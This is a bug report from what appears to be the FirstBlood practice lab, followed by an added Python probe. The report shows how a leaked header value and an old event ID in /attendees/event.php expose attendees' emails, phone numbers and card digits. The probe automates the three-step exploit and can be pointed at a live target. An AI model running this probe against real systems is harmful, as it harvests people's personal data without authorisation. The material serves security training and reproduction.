FirstBlood-#117 — Unauthorized access to critical users' PII through the vulnerable /attendees/event.php endpoint
This issue was discovered on FirstBlood v1
On 2021-05-10, holybugx Level 5 reported:
Description
Hello Sean,
I found out that visiting the /hackerback.html endpoint results in an interesting inline JavaScript in the source code of the page:
<script>
function getAttendees() {
    var attending = false;
    // attending is hard-coded to false, so the page itself never sends this request
    if (attending == true) {
        sendRequest("/attendees/event.php?q=560720");
    }
}
</script>
Simply opening /attendees/event.php?q=560720 results in an empty JSON page; however, from my previous knowledge of the application I had found that visiting /drpanel/drapi/sitesettings.php leaks an interesting JSON array:
{
"site": "firstblood",
"process": "eventhandler",
"x-required": [
{
"x-site-req": "permitted"
},
{
"type": "request"
}
],
"active": true
}
I understood that x-site-req should be used as an HTTP header, so adding x-site-req: permitted to the HTTP request headers of /attendees/event.php?q=560720 leads to disclosure about the "hackerbank" event. You can add the x-site-req: permitted header using Burp Suite:
When I was inspecting the returned JSON, I found an interesting JSON parameter, "old_eventID":"560700". So I changed the /attendees/event.php?q=560720 endpoint to /attendees/event.php?q=560700 (keeping the x-site-req: permitted header) and there are critical PII leaks of users.
An example of the critical PII leakage, such as "last_4_CC":
{
"name": "Sean R",
"email": "[email protected]",
"confirmed": true,
"contactNumber": "+44 141 496 0250",
"last_4_CC": "9090"
},
Impact
- Critical PII Leakage of users
If you need any further assistance, let me know.
Best Regards,
HolyBugx
P1 CRITICAL
Parameter:
Payload:
FirstBlood ID: 13
Vulnerability Type: Information leak/disclosure
/attendees/event can be seen on the HackerBack.html page but has a blank response. Upon further inspection and from making use of the web app, you will notice you can add certain headers in order to interact with this endpoint. An old event ID leaks PII information about attendees.
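The check below is an added example, not code from the report, from the reporter, or from FirstBlood. It turns the three steps above into a repeatable probe: request the event without the header (expect empty JSON), repeat with x-site-req: permitted (expect the event record), pull old_eventID out of it and request that older event, then flag any of the PII field names the report shows (email, contactNumber, last_4_CC). The fetch callable is pluggable so the same probe runs against a live target over HTTP or, as here, against a constructed fake server that only reproduces the behaviour the report describes; the exact layout of the real 560720 response, the base URL, and the sample attendee values are assumptions.

```python
"""Reproduction helper for the /attendees/event.php finding (added example).

Facts taken from the report: the endpoint path, q=560720 and q=560700,
the x-site-req: permitted header learned from /drpanel/drapi/sitesettings.php,
the old_eventID field, and the PII field names in the leaked attendee record.
Everything else (response layout, sample values, base URL) is constructed.
"""
import json
import urllib.request

ENDPOINT = "/attendees/event.php"
GATE_HEADER = ("x-site-req", "permitted")
PII_FIELDS = ("email", "contactNumber", "last_4_CC")  # names seen in the report


def http_fetch(base_url):
    """Return a fetch(path, headers) callable backed by urllib, for live use."""
    def fetch(path, headers):
        req = urllib.request.Request(base_url + path, headers=headers)
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    return fetch


def fake_fetch(path, headers):
    """Constructed stand-in for the target, mimicking only what the report shows."""
    if not path.startswith(ENDPOINT + "?q="):
        return 404, ""
    if headers.get(GATE_HEADER[0]) != GATE_HEADER[1]:
        return 200, "{}"  # empty JSON page when the header is missing
    q = path.split("?q=", 1)[1]
    if q == "560720":
        # event record shape is assumed; old_eventID is the value from the report
        return 200, json.dumps({"event": "hackerbank", "old_eventID": "560700"})
    if q == "560700":
        # attendee record modelled on the report; email/contact values are constructed
        return 200, json.dumps({"attendees": [
            {"name": "Sean R", "email": "sean@example.invalid", "confirmed": True,
             "contactNumber": "+44 141 496 0250", "last_4_CC": "9090"}]})
    return 200, "{}"


def walk(obj):
    """Yield every dict nested anywhere inside a parsed JSON value."""
    if isinstance(obj, dict):
        yield obj
        for v in obj.values():
            yield from walk(v)
    elif isinstance(obj, list):
        for v in obj:
            yield from walk(v)


def find_pii(doc):
    """Return the set of PII field names present anywhere in the document."""
    return {k for d in walk(doc) for k in d if k in PII_FIELDS}


def probe(fetch, event_id="560720"):
    """Run the report's three steps through `fetch` and return the findings."""
    hdr = {GATE_HEADER[0]: GATE_HEADER[1]}
    findings = {"empty_without_header": False, "header_gate_bypassed": False,
                "old_event_id": None, "pii_fields": set()}

    # Step 1: without the header the endpoint answers with an empty JSON body.
    _, body = fetch(f"{ENDPOINT}?q={event_id}", {})
    findings["empty_without_header"] = not json.loads(body or "{}")

    # Step 2: the static header value leaked by sitesettings.php unlocks the record.
    _, body = fetch(f"{ENDPOINT}?q={event_id}", hdr)
    current = json.loads(body or "{}")
    findings["header_gate_bypassed"] = bool(current)

    # Step 3: follow old_eventID (an IDOR on q=) and look for attendee PII.
    old_id = next((d["old_eventID"] for d in walk(current) if "old_eventID" in d), None)
    findings["old_event_id"] = old_id
    if old_id is not None:
        _, body = fetch(f"{ENDPOINT}?q={old_id}", hdr)
        findings["pii_fields"] = find_pii(json.loads(body or "{}"))
    return findings


if __name__ == "__main__":
    # Offline run against the constructed fake; swap in http_fetch("http://target")
    # (base URL assumed) to run the same probe against a real instance.
    print(json.dumps(probe(fake_fetch), default=sorted, indent=2))
```

The probe treats the presence of any listed field name as a finding rather than matching values, so it stays useful when the attendee data differs from the sample in the report; `http_fetch` is the only part that touches the network and is unused in the offline run.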